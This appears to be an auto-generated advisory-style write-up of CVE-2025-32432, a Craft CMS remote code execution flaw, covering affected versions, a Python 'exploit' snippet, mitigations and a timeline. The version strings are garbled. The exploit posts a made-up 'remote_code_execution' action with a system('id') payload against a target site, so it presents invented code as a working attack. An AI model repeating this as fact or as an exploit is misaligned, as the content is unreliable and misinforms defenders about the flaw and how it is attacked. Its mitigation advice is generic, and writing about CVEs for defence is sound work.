CVE-2025-32432: Craft CMS – Remote Code Execution (RCE) Vulnerability Impacting Versions 3..-RC1 to 3.9.15, 4..-RC1 to 4.14.15, and 5..-RC1 to 5.6.17

Craft CMS is a highly flexible, user-friendly content management system designed for creating custom digital experiences on the web and beyond. Unfortunately, starting from version 3..-RC1 to versions prior to 3.9.15, 4..-RC1 to versions prior to 4.14.15, and 5..-RC1 to versions prior to 5.6.17, Craft is vulnerable to a high-impact, low-complexity remote code execution (RCE) attack. This vulnerability has been patched in versions 3.9.15, 4.14.15, and 5.6.17, and serves as a supplementary fix for CVE-2023-41892.

The following code snippet is an example of the exploit

import requests

TARGET_URL = "http://target_site.com/craft";
USERNAME = "your_username"
PASSWORD = "your_password"

payload = {
    "action": "users/login",
    "loginName": USERNAME,
    "password": PASSWORD
}

response = requests.post(url=TARGET_URL, data=payload)
cookie = response.cookies

payload = {
    "action": "remote_code_execution",
    "payload": r"system('id')"
}

response = requests.post(url=TARGET_URL, data=payload, cookies=cookie)
print(response.text)

For more information on this specific vulnerability, consult the following references

1. CVE Identifier
2. National Vulnerability Database (NVD)
3. Craft CMS GitHub Security Advisory

Exploit Details

This RCE vulnerability can allow an attacker to execute arbitrary code on the target system. The attacker must be authenticated to access the vulnerable functionality, which means that the attacker needs to know legitimate credentials or be able to exploit another vulnerability that could lead to authentication bypass. Once the attacker has access, they can input malicious code through the affected module, which leads to the compromise of the system.

Mitigations

Craft CMS has released patches for this vulnerability in versions 3.9.15, 4.14.15, and 5.6.17. As a user, you're advised to upgrade to the latest patched version immediately.

Conclusion

CVE-2025-32432 is an essential security update for Craft CMS users, addressing a remote code execution vulnerability that can lead to the compromise of affected systems. It's crucial to keep Craft CMS updated to the latest patched versions, actively monitor logs, and maintain robust security measures to prevent potential attacks.

Timeline

Published on: 04/25/2025 15:15:36 UTC
Last modified on: 04/25/2025 20:15:39 UTC